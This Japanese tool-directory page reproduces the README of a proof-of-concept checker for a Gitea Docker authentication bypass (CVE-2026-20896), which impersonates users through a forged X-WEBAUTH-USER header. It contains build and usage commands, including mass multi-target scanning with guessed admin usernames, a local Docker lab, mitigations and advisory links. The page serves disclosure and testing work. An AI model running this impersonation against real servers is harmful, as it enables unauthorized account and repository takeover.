Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2026-20896-gitea-poc — CVE-2026-20896 Gitea Docker X-WEBAUTH-USER 認証バイパスチェッカー | Kitploit
ツール/GitHubGitHub/szybnev/cve-2026-20896-gitea-poc
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubszybnev/cve-2026-20896-gitea-poc

cve-2026-20896-gitea-poc

CVE-2026-20896 Gitea Docker X-WEBAUTH-USER 認証バイパスチェッカー

リポジトリを見る
101ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-20896 Gitea Docker 認証バイパスチェッカー

認可されたレッドチーム / ペンテスト運用のみ。

このリポジトリには、CVE-2026-20896 用の最小限のチェッカーが含まれています。これは、リバースプロキシ認証が有効な場合に、公式 Gitea Docker イメージ(1.26.2 までを含む)における認証バイパスです。

CVE-2026-20896 とは

影響を受ける Gitea Docker イメージには、以下の app.ini テンプレートが同梱されていました:

root@kitploit:~
REVERSE_PROXY_TRUSTED_PROXIES = *

管理者が以下を有効にした場合:

root@kitploit:~
ENABLE_REVERSE_PROXY_AUTHENTICATION = true

Gitea は、コンテナの HTTP ポートに直接到達できる任意の送信元 IP からの X-WEBAUTH-USER を信頼していました。意図された認証リバースプロキシをバイパスしたクライアントは、単一のヘッダーを送信するだけで、既知または推測可能なユーザーになりすますことができました。

現実的な影響は、認証なしのアカウントなりすましです。推測したユーザーが管理者である場合、最悪のケースでは Gitea インスタンスとそのリポジトリの完全なアプリケーションレベル乗っ取りに至ります。ホスト上の RCE は環境に依存し、このチェッカーでは主張していません。

修正版は 1.26.3 以降です。1.26.4 以上へのアップグレードが推奨されます。

PoC の仕組み

チェッカーは以下の処理を行います:

  1. ターゲットのホームページを取得します。
  2. Powered by Gitea Version: 1.26.4 のようなフッターテキストを探します。
  3. 解析したバージョンが >= 1.26.3 の場合、デフォルトでテストをスキップします。
  4. 指定された各ユーザー名に対して、X-WEBAUTH-USER: <username> を含む GET / リクエストを送信します。
  5. 返されたページタイトルがそのユーザーのログイン済みダッシュボードのように見える場合にヒットを報告します。

Go 版は、複数ターゲット、ユーザー名ファイル、並行処理、タイムアウト、JSONL 出力、TLS --insecure、--dry-run、--force をサポートしています。

ビルド

root@kitploit:~
go build -o gitea-cve-2026-20896-check .

サードパーティの Go 依存関係は不要です。

使用方法

単一ターゲット:

root@kitploit:~
./gitea-cve-2026-20896-check \
  --url http://localhost:3000 \
  --users admin,gitea_admin,alice

複数ターゲットとユーザー名:

root@kitploit:~
./gitea-cve-2026-20896-check \
  --targets targets.txt \
  --user-file users.txt \
  --concurrency 64 \
  --timeout 8s \
  --jsonl

ドライラン:

root@kitploit:~
./gitea-cve-2026-20896-check \
  --url http://localhost:3000 \
  --users admin,alice \
  --dry-run

Bash フォールバック:

root@kitploit:~
./poc.sh --url http://localhost:3000 --users admin,alice

終了コード

  • 0: 脆弱ななりすましが少なくとも 1 件確認された
  • 1: 脆弱ななりすましが確認されなかった
  • 2: 使用方法、入力、または実行時エラー

ローカル再現ラボ

以下のラボは、影響を受けるローカル Gitea コンテナを起動し、テストユーザーを作成します:

root@kitploit:~
docker run -d --name gitea-cve-2026-20896 \
  -p 127.0.0.1:3000:3000 \
  -e GITEA__service__ENABLE_REVERSE_PROXY_AUTHENTICATION=true \
  -e GITEA__security__INSTALL_LOCK=true \
  gitea/gitea:1.26.2

sleep 15

docker exec --user git gitea-cve-2026-20896 gitea admin user create \
  --username alice \
  --password 'longpasswordhere1234' \
  --email [email protected] \
  --must-change-password=false

./gitea-cve-2026-20896-check --url http://localhost:3000 --users bob,alice,admin

期待される陽性結果:

root@kitploit:~
[VULNERABLE] http://localhost:3000 user=alice title="alice - Dashboard - Gitea: Git with a cup of tea"

クリーンアップ:

root@kitploit:~
docker rm -f gitea-cve-2026-20896

緩和策

  • Gitea を 1.26.3 以上にアップグレードしてください。1.26.4 以上が推奨されます。
  • バックエンドの Gitea コンテナの HTTP ポートを信頼できないネットワークに直接公開しないでください。
  • 信頼するリバースプロキシを明示的に設定してください。
  • ネットワーク経路とプロキシの信頼境界を理解していない限り、リバースプロキシ認証を無効のままにしてください。

参考情報

  • Gitea セキュリティアドバイザリ: https://github.com/go-gitea/gitea/security/advisories/GHSA-f75j-4cw6-rmx4
  • Gitea 1.26.3 / 1.26.4 のリリースノート: https://blog.gitea.com/release-of-1.26.3-and-1.26.4/
  • 修正 PR: https://github.com/go-gitea/gitea/pull/38151
  • CVE レコード: https://www.cve.org/CVERecord?id=CVE-2026-20896
  • The Hacker News / Sysdig テレメトリによる実環境での探索レポート: https://thehackernews.com/2026/07/threat-actors-probe-gitea-docker-flaw.html
ツールをダウンロード